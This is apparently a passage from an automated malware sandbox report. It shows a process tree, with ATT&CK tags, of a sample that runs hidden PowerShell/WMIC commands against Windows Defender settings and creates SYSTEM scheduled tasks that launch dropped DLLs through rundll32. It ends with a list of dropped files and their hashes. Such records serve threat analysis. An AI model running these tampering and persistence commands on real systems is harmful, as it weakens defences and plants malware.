                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:7672
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:4840
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                          PID:7416
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                            PID:7448
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                PID:4680
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                        schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\tSRsKJOgU\wAuNny.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wovFAmtOpAxrHrl" /V1 /F
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                        PID:7948
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "wovFAmtOpAxrHrl2" /F /xml "C:\Program Files (x86)\tSRsKJOgU\awTwKtb.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                        PID:4856
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                        schtasks /END /TN "wovFAmtOpAxrHrl"
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:7616
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                          schtasks /DELETE /F /TN "wovFAmtOpAxrHrl"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:7188
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "OrspJZQoDyehPl" /F /xml "C:\Program Files (x86)\QubjZgZsgVxU2\mVIhuBD.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                            PID:8064
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "AfBtKiWWYHIKP2" /F /xml "C:\ProgramData\mjUPcNFqgWzmMMVB\fIvHwRk.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                            PID:6620
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "WyNLkpRDmiMxCDgFB2" /F /xml "C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR\pcGMBAa.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                            PID:2900
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "sTjfLxzHimdPzpCahty2" /F /xml "C:\Program Files (x86)\XhLCDmquyDmYC\AoNIRfw.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                            PID:6944
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "eXInJQFSFxFSzhMHF" /SC once /ST 03:04:18 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\gGlzHXLNukBnGkUk\jbeUrVxm\vPcAXXR.dll\",#1 /FwJdidu 385132" /V1 /F
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                            PID:6744
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                            schtasks /run /I /tn "eXInJQFSFxFSzhMHF"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:6820
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                              schtasks /DELETE /F /TN "tYRFAYEmQKskppbAu"
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:5352
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 2060
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                PID:2812
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6044 -ip 6044
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:7320
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gGlzHXLNukBnGkUk\jbeUrVxm\vPcAXXR.dll",#1 /FwJdidu 385132
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:6204
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gGlzHXLNukBnGkUk\jbeUrVxm\vPcAXXR.dll",#1 /FwJdidu 385132
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:7220
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "eXInJQFSFxFSzhMHF"
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:5596
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5636 -ip 5636
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:5332
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 7312 -ip 7312
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:6200
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:6376

                                                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            2.5MB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            31741378b25e607b539c7e656a20c9f9

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            6f8bc9ae4117fba80732c0f2e614a48b42a83310

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            67f6eae8c50d4b3ae0e2f6307114242577b4e3b5e350028ca630aa62a6902d66

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            3e0473e04883292cc46d31a79c67de411ed71cad6cd8551e70dc989ac2f858f62e3ad1682a705b82a0c825cb2515d12a9c7c5cda272169348f6a3382b08655f5

                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\DAAFBAKECAEG\EBFBKF

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            46KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            8f5942354d3809f865f9767eddf51314

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            20be11c0d42fc0cef53931ea9152b55082d1a11e

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\DAAFBAKECAEG\ECGIII

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            20KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            42c395b8db48b6ce3d34c301d1eba9d5

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            b7cfa3de344814bec105391663c0df4a74310996

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\FBKJKEHIJECG\AAEHID

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            116KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            f70aa3fa04f0536280f872ad17973c3d

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            50a7b889329a92de1b272d0ecf5fce87395d3123

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\FBKJKEHIJECG\ECGIII

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            124KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            9618e15b04a4ddb39ed6c496575f6f95

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            1c28f8750e5555776b3c80b187c5d15a443a7412

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\FBKJKEHIJECG\ECGIII

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            cf7a291fa3c23b1fa0a0c003717ca899

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            a8feadd23a73c1c7783b5e56ce951c84f97e3851

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            fd821a883d1953d95a9e616db71d43071afde16947f331f523ce8ea20c39d139

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            0dfffbc596515ac284f8ab8fac13f1bbb496223ee7d849e9b8976b6f75a5c257619010419c5e441b84a538a7409bf0cefaf5f7b65bc7736842030c10eef4856f

                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\FBKJKEHIJECG\IJEGDB

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            152KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            73bd1e15afb04648c24593e8ba13e983

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\FCBAECGIEB.exe

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            4.3MB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            7f81200d5a684a89dda672e85490ea30

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            47702e5faa3b1c749e33a94f2bf9236657225c64

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            c23b4a05be1b5587fe7d4283c7a99e44b695f486db8f225f5eabf9d7df75f37a

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            f792d4d052a6e4564b245b0144750993a90a7632271af4a5513509f7a53e91f2da1e65e20c1ffeb3dc1d2695d9fe7c108811e009fbfbc34c452737af12cfb5f5

                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\GCBGCAFIIE.exe

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            4.3MB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            2b40a46d4856cb9f79ecdd2d19ad74e7

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            1dc70b5aecf5e570e06dcabbc94a795df1f1549f

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            394f23df8704f763b90149b09c73a1a841e8590541d33b98a6c7412ff9bfa27c

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            6176850bb3ab1b7bb00c63b1ae4d8e5277dbb41dc4d8f8d3116bdf79c1aaeb111576911b32901745af63225faf4af07786949d7d761208475c555be1efa84654

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\156887258BBD6E1FEF562837733EA04E_5BBC02CEDFD3F7AC9E268D830CF231EE

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            2KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            789be828466447d339b5b980bdd21123

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            24609301e9d3f2077d71f00e16a129e54c83cd10

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            78feac3dea91710afe23417f446f69556e684cb839dbb6b0a20b5e98a6439fc4

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            39f4c83ae88c4598b60bc222a240857616f4bf4153d24bd7e521f0b14343e156f0ac5c78893f61ec2ea5a598b28ef23da0cef4b2ae1f17bf243dbb2614fa3ab4

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            2KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            44993f4235f29d67857c7f7cf65f62f6

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            c57ea37d23e4d453d36cbad04da2449fd2d0e32a

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            d287a6f3e41f06778b5616520de304526141c31d5e72b4ca1b71b30137f89c3e

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            eb711af3908e4a3bdfe85e02d60a1a5d9efb12519a5ca81c78b76bd80f4c38894865647405c1e94f0857cd2d595063a6d12015d6de6a4fa77c786b365b98ebf9

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            d9d5d3b80e918eae4c576957b2d7c6cc

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            8387986077beffef2f3f8d44ea49b4fcefc4cf89

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            9fc64afad2e4a1fc040f1238568e716042cb61f6a736274e9ef58d3667dfb1b8

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            b0fec2a7373717bc911bc58e5f7bf6406963435079ca69d688cfbb333852dc0085bff807329467a8c19b9672dbaf269d929c5ce398ec30a7b5819193be7d3b3a

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\156887258BBD6E1FEF562837733EA04E_5BBC02CEDFD3F7AC9E268D830CF231EE

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            458B

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            6035ea9890017dd23afb2c9e5c5355b7

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            6c491e94da91e4363336ba0aed85f28bdd6806bb

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            175c93b88ec165015bc04e4d7462d1f79ba5c3b6ea2d1cbe381c01bc0c62da88

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            a636dedbf63547078925923eb15f7f64e248ad10eedcd639dd041febf7ec3f2bfc8a38bfe8df608ead62be050b904f7c11ac6a8f359e2dd6a1518a30cd42dd6b

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            450B

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            9f2fc0359192953df6824ecf08ceca76

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            dbc5159cf2f1e2188d8628c0e77f864462269430

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            3de434113fd10badcb992efa2fde3377ddf80a2a3f5ff89d138e2a661b5ac74c

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            76c032d82ab1fc0d2e9c95fe62c6d23e60404adde9e7e65ed1002e32ce25f74cd9ed8c8469a173e6b7bf67cea1bcaa8492d55db349d5abe64027b94feb0e185e

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            458B

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            2f7604286efc4f36f38be1fde8f3f675

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            e12e01ac3e6790fca06dd805fdf45b5bd93a7dcf

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            acb1648155091e59acfa6d6a835bc52f77fdf031daa5d6670dd71f65684e98d5

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            a5edd0b175449a363031fe6b85bb8dc236df01deafc5bfaa8089078a69fb40d992c3def3a67fa96231ecf3e5f7ade316097eb7545ee6009a2eae7b1375e3a0d4

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            187B

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            136B

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            150B

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            2B

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            11KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            0d88a585b96588dc00a5c9f0ea75db03

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            edbdd6f36d609ba8490b7ad1f887220689cb62c3

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            8277c693ae983350abfd3e94b60d43e981272b915b3ccb67afef64dd0fb9c081

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            4b2474901c3e080a6d0fc767e1bff39e9217d8c360fe122f198edef7094a31864108093f2e04d91ebdebf911531a35a168e6d5e3b0e8bcdff4965785d65194da

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            2KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            60ad21e008a8447fc1130a9c9c155148

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            5dfa21d14dc33de3cc93a463688fe1d640b01730

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            bb65e24fd8681e7af464e115fba42ff7713e933683cbd654a124c0e564530bb9

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            42a2753f717a4984967907fa69200e8a464068a6d4a226803cf9503ffb7fee540ffc611b4c905cc84f3623639a6aa93003b390f9c38e601b59f171a9e90bd9b6

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            152B

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            f4e6521c03f1bc16d91d99c059cc5424

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            043665051c486192a6eefe6d0632cf34ae8e89ad

                                                                                                                                                                                                                                                                                                                            SHA256

